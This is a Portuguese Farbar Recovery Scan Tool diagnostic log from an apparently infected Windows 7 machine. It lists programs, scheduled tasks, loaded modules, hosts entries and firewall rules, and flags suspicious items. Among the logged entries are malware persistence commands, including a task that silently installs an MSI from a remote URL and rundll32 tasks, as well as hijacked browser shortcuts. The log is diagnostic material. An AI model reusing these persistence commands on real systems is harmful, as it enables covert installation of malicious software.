Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 15-03-2017
Executado por Renato (21-03-2017 15:09:01)
Executando a partir de C:\Users\Renato\Downloads
Windows 7 Ultimate (X64) (2015-06-24 16:44:23)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================

Administrador (S-1-5-21-3989744648-3571885242-2210684081-500 - Administrator - Disabled)
Convidado (S-1-5-21-3989744648-3571885242-2210684081-501 - Limited - Enabled)
Renato (S-1-5-21-3989744648-3571885242-2210684081-1000 - Administrator - Enabled) => C:\Users\Renato

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

64 Bit HP CIO Components Installer (Version: 18.2.4 - Hewlett-Packard) Hidden
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Reader 9.3 - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-A93000000001}) (Version: 9.3.0 - Adobe Systems Incorporated)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{761B6C00-A23A-4F17-9D23-CB7E48307314}) (Version: 16.1.0.843 - Corel Corporation)
Corel Graphics - Windows Shell Extension (x32 Version: 16.1.843 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 64 Bit (Version: 16.1.843 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X5 - Windows Shell Extension 64 Bit (Version: 15.0.487 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - BR (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Capture (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Common (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Connect (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Custom Data (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Draw (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Filters (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - FontNav (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - IPM (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - PHOTO-PAINT (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Photozoom Plugin (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Redist (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Setup Files (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VBA (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VideoBrowser (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - VSTA (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 - Writing Tools (x32 Version: 16.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X6 (HKLM-x32\...\_{511DE7EA-AA68-4D7A-A2E3-0E7B5186B822}) (Version: 16.1.0.843 - Corel Corporation)
CorelDRAW Graphics Suite X6 (x32 Version: 16.1 - Corel Corporation) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HPSSupply (x32 Version: 140.0.212.0 - Hewlett-Packard) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Jogotempo version 5.0 (HKLM-x32\...\{B552B283-6EBC-457E-8187-01682C83F26C}_is1) (Version: 5.0 - ) <==== ATENÇÃO
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Kyocera Product Library (HKLM\...\Kyocera Product Library) (Version: 2.0.713 - Kyocera Mita Corporation)
KYOCERA Status Monitor 4 (HKLM\...\{24EE7F6D-C648-463f-9E71-DC5FD2258D16}) (Version: 4.1.3407 - KYOCERA Document Solutions Inc.)
Kyocera TWAIN Driver (HKLM-x32\...\InstallShield_{249E5A9C-3F72-49B1-B222-FEF550315CC5}) (Version: 1.7.0615 - Kyocera Mita)
Kyocera TWAIN Driver (x32 Version: 1.7.0615 - Kyocera Mita) Hidden
Kyocera TWAIN Driver (x32 Version: 2.0.1514 - KYOCERA Document Solutions Inc.) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0416-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 52.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 52.0.1 (x86 pt-BR)) (Version: 52.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.1.6284 - Mozilla)
Pacote de Idiomas do Microsoft .NET Framework 4 Client Profile - Português (Brasil) (HKLM\...\Microsoft .NET Framework 4 Client Profile PTB Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Pacote de Idiomas do Microsoft .NET Framework 4 Extended - Português (Brasil) (HKLM\...\Microsoft .NET Framework 4 Extended PTB Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Realtek Card Reader (HKLM-x32\...\{F0A8BF4A-972F-41E0-9800-1EFE3BF28266}) (Version: 6.2.9200.30158 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6196 - Realtek Semiconductor Corp.)
ScanSoft PaperPort 11 (HKLM-x32\...\{C0E5B596-4F4F-4A45-A679-153693101050}) (Version: 11.1.0.307 - Nuance Communications, Inc.)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Software de dispositivo do Chipset Intel® (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer)
USB Enhanced Performance Keyboard (HKLM\...\{989DC5D9-A776-430D-9E16-D36E5B81CD86}) (Version: 2.0.2.2 - Lenovo)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0007}\InprocServer32 -> C:\Users\Renato\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0007}\InprocServer32 -> C:\Users\Renato\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\FileSyncApi64.dll (Microsoft Corporation)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {1CEE2198-8667-49BC-AF1F-356E98922469} - System32\Tasks\KuaiZip_Update => C:\Program Files\¿ìѹ\X86\Update.exe [2017-03-21] (Shanghai Guangle Network Technology Ltd ) <==== ATENÇÃO
Task: {32999B49-7909-48C0-946D-61737F132B2B} - System32\Tasks\47o751o563t157 => Rundll32.exe "C:\ProgramData\47o751o563t157\47o751o563t157.dll",otWPQTje <==== ATENÇÃO
Task: {34C3E152-3778-4D63-B299-912667BA867B} - System32\Tasks\Stukatprjertion Update => C:\Program Files (x86)\Vehotherdreguty\xnmush.exe [2017-03-21] (Glarysoft Ltd)
Task: {53952A1E-B8FE-4821-8642-0B7FDD59C9BA} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
Task: {562D57D8-E524-498A-A3F5-24DF8C8932F2} - System32\Tasks\Motupyanegcult Cache => C:\Program Files (x86)\Qejisyfank\xdrijot.exe [2017-03-21] (Glarysoft Ltd)
Task: {6007D9C6-4BDD-4D2C-9DD6-4F10C0E83CD3} - System32\Tasks\{CA5F38A2-BA0E-42A7-852A-90DC65B25F7C} => pcalua.exe -a "C:\Program Files\7LTGCYUNFZ\uninstaller.exe" -d "C:\Program Files\7LTGCYUNFZ"
Task: {7CF49F9B-C8C2-470F-B9E2-64C41094BE12} - System32\Tasks\{5B2EF4D7-B689-467E-B599-43B633463A9A} => pcalua.exe -a E:\autorun.exe -d E:\
Task: {807F7ACB-8E9A-47D6-AB50-352D97313D14} - System32\Tasks\{898BE662-29B0-49C3-949D-73F206BE2086} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904\onedrivesetup.exe" -d "C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904" -c C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904\onedrivesetup.exe /silent /permachine /silent (a entrada de dados tem 69 mais caracteres).
Task: {9C5B455B-A6CE-4968-B3D0-455DCEAA9930} - System32\Tasks\{FF08FBC2-6458-4BE0-AFCB-B4D776CF518F} => pcalua.exe -a C:\Users\Renato\Downloads\GBPCEF.exe -d C:\Users\Renato\Downloads -c admin_service
Task: {AF153F75-35BB-4236-9FF7-D304D0E69C85} - System32\Tasks\{27CF2902-E889-0B48-0CFD-7205D36734C5} => C:\Users\Renato\AppData\Roaming\wincy\sync.exe
Task: {C4157637-0EBB-430C-A68E-D2143F43003D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-06-24] (Google Inc.)
Task: {C67EF8BF-598F-4098-BDD9-29361EA6BA9A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {C9A2F3D8-69BE-4CC2-9925-1F569ECE1E2C} - System32\Tasks\Ckibugh => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000AAKX-08U6AA0_WD-WCC2EX78323383233&v=20170321 /q <==== ATENÇÃO
Task: {CA8552E2-787F-459F-92BD-37AD073D26D9} - System32\Tasks\osTip => Chrome.exe <==== ATENÇÃO
Task: {D34ECB37-68C7-4FF7-AA02-85B72E1D79BC} - System32\Tasks\mG41sVNMLM => C:\Program Files (x86)\jsXuLWuidd\updengine.exe [2017-03-13] () <==== ATENÇÃO
Task: {D440D320-D3D3-4ABA-B0EC-501C5ABD76E4} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: {DD1F8A83-35FA-4C2A-96AA-0134DC257A0C} - System32\Tasks\47o751o563t157-dll => Rundll32.exe "C:\ProgramData\47o751o563t157\47o751o563t157.dll",otWPQTje
Task: {EA422E2F-0B53-4A7F-A31D-CE23B4239483} - System32\Tasks\Microsoft\Windows\Media Center\RegisterObject => C:\\ProgramData\\RegisterObject\\RegisterObject.exe [2017-03-20] () <==== ATENÇÃO
Task: {FCEAFE40-98BF-410E-B09C-72E066A07962} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-06-24] (Google Inc.)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: C:\Windows\Tasks\{27CF2902-E889-0B48-0CFD-7205D36734C5}.job => C:\Users\Renato\AppData\Roaming\wincy\sync.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> www.123rede.com?oem=sv1&uid=WD-WCC2EX783233_WDCWD5000AAKX-08U6AA0&tm=1490115698 --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> www.123rede.com?oem=sv1&uid=WD-WCC2EX783233_WDCWD5000AAKX-08U6AA0&tm=1490115698

==================== Módulos Carregados (Whitelisted) ==============

2015-12-16 11:39 - 2014-06-26 19:10 - 00595456 _____ () C:\Program Files (x86)\DoroPDFWriter\Doro.dll
2017-03-21 14:02 - 2017-03-21 14:02 - 00307712 _____ () C:\Program Files (x86)\Stukatprjertion Update\local64spl.dll
2017-03-21 13:57 - 2017-03-21 13:57 - 01620992 _____ () C:\ProgramData\service.exe
2015-06-24 14:51 - 2015-06-24 14:50 - 00008192 _____ () C:\Windows\SysWOW64\srvany.exe
2015-06-24 14:51 - 2015-06-24 14:50 - 00151552 _____ () C:\Windows\KMService.exe
2017-03-21 13:57 - 2017-03-21 13:57 - 00177152 _____ () C:\Windows\svchost.exe
2017-03-21 13:57 - 2017-03-21 13:57 - 01466213 _____ () C:\Windows\csrss.exe
2017-03-21 13:56 - 2016-11-10 04:19 - 05091840 _____ () C:\Users\Renato\AppData\Roaming\WMPNetworkAcSvc\WMPNetworkAcSvc.exe
2017-03-21 13:57 - 2014-03-22 15:18 - 03100672 _____ () C:\ProgramData\47o751o563t157\47o751o563t157.dll
2017-03-21 14:46 - 2017-03-21 14:46 - 00214016 _____ () C:\Windows\TEMP\g7A8D.tmp.exe
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2017-03-21 14:00 - 2017-03-21 14:00 - 00524696 _____ () C:\Program Files\¿ìѹ\X64\KZipShell.dll
2015-06-24 14:01 - 2014-01-23 06:35 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2017-03-21 13:57 - 2017-03-21 13:57 - 02072064 _____ () C:\Users\Renato\AppData\Local\Temp\00009360\msiql.exe
2017-03-21 12:56 - 2017-03-21 10:18 - 120090112 _____ () C:\Users\Renato\AppData\Local\LikeToles01a\MCHromptoolz0.exe
2017-03-21 14:47 - 2017-03-21 14:47 - 03531776 _____ () C:\Windows\TEMP\g6106.tmp
2017-03-21 14:00 - 2017-03-21 14:00 - 00219032 _____ () c:\program files\¿ìñ¹\x86\kuaizipupdatechecker.dll
2017-03-13 17:46 - 2017-03-13 17:46 - 01009152 _____ () C:\Program Files (x86)\jsXuLWuidd\kl.dll
2017-03-21 13:56 - 2016-03-06 04:40 - 00083456 _____ () C:\Users\Renato\AppData\Roaming\WMPNetworkAcSvc\Interface.dll
2017-03-21 12:44 - 2017-03-21 12:44 - 02145792 _____ () C:\Users\Renato\AppData\Roaming\c4dRcR\dbghelp.dll
- - 00000000 _____ () C:\Users\Renato\AppData\Roaming\c4dRcR\JO5Urp.dll:dGdLpRi8
2017-03-21 14:46 - 2017-03-21 14:46 - 03765248 _____ () C:\Windows\TEMP\g4D73.tmp
2010-01-30 02:41 - 2010-01-30 02:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2017-02-07 07:58 - 2017-02-01 06:01 - 01870168 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-07 07:58 - 2017-02-01 06:01 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Windows:nlsPreferences [386]
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Windows\System32:A171AC58_Cef.gbp [2]
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2166]
AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)

==================== Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\.DEFAULT\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\caixa.gov.br -> imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\internet-explorer-config.com -> internet-explorer-config.com

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-13 23:34 - 2017-03-21 14:08 - 00001721 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 beautifllink.xyz

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Renato\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

MSCONFIG\Services: wuauserv => 2

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [TCP Query User{8E4EC827-FAEE-4F70-BC55-00364973A644}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{4EA8C53C-27D1-459A-9CDF-B299E14AAAB1}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{A447CDD5-02A1-44EB-AD74-AF1BB43D59D6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3438801C-4444-4AA3-84FB-E4B947DBB644}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{08D4A4D1-B556-4EA2-8212-F60A526FEF83}C:\users\renato\desktop\aa_v3.1.exe] => (Block) C:\users\renato\desktop\aa_v3.1.exe
FirewallRules: [UDP Query User{FE5EE235-DD96-4A22-AE50-41D7E712CC36}C:\users\renato\desktop\aa_v3.1.exe] => (Block) C:\users\renato\desktop\aa_v3.1.exe
FirewallRules: [{615395E2-8AD0-4B24-9683-7B01DD6BBBBF}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{1F613E4A-E602-4F8E-9AB9-090A14CBD1EE}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A6C63288-ABDE-48A1-B3EA-E1578367D8F8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1E6BCE3B-2114-4AD2-A2AC-024FB6F44329}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{9ECAD9B8-08D6-4652-8D24-5BA0A1BD0347}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{4A9E189B-4B30-4BC3-B586-8073C1052CB3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6CF0F38F-BB8E-446D-BBCD-E374549FB562}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{C0DBD949-7FCC-4D2C-8471-53412ABD40E7}] => (Allow) LPort=2869
FirewallRules: [{11BE0587-ABDF-438E-9458-88EFE09E8670}] => (Allow) LPort=1900
FirewallRules: [{56DBCCE7-8211-4064-9C74-2592D3C47C6C}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{E37700FC-8AD6-4E87-B656-550473F37C5D}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{1D4F54D9-025D-47B0-A9D0-8BB227567ADF}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{AF1AFE9C-B985-4B23-8C9B-76A503107FE5}] => (Allow) C:\Windows\System32\rundll32.exe

==================== Pontos de Restauração =========================

13-03-2017 11:00:09 Backup do Windows
20-03-2017 11:00:09 Backup do Windows
21-03-2017 12:45:28 Windows Live Essentials
21-03-2017 12:46:06 DirectX instalado
21-03-2017 12:46:25 DirectX instalado
21-03-2017 13:01:29 Windows Live Essentials
21-03-2017 13:26:22 Windows Live Essentials
21-03-2017 13:30:59 DirectX instalado
21-03-2017 13:31:24 DirectX instalado
21-03-2017 13:31:34 DirectX instalado
21-03-2017 14:22:29 Operação de restauração

==================== Dispositivos Apresentando Falhas No Gerenciador =============

Name: Controlador de comunicação PCI simples
Description: Controlador de comunicação PCI simples
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Adaptador de Túnel Teredo da Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Warsaw - Driver (PP)
Description: Warsaw - Driver (PP)
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: wsddpp
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved.

==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================

Erros de Sistema:
=============

CodeIntegrity:
===================================
Date: 2017-03-21 14:45:21.271
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\winhttp.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-03-21 14:45:21.256
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\winhttp.dll because the set of per-page image hashes could not be found on the system.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i3-3240 CPU @ 3.40GHz
Percentagem de memória em uso: 59%
RAM física total: 4013.2 MB
RAM física disponível: 1633.82 MB
Virtual Total: 8024.54 MB
Virtual disponível: 5445.75 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:68.26 GB) (Free:32.07 GB) NTFS
